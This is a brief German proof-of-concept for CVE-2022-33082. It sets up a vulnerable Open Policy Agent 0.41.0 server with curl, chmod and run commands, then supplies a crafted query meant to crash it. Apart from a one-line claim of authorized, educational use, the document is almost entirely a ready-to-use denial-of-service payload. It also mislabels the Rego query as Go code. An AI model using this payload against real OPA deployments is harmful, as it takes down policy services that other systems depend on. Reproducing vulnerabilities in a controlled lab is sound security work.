
Proof-of-Concept-Exploit für CVE-2022-33082, der einen Denial-of-Service in Open Policy Agent Versionen ≤0.41.0 durch manipulierte Eingabe verursacht. Vorgesehen für autorisierte Tests und zu Bildungszwecken.
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
Abfragefeld (Go-Code):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }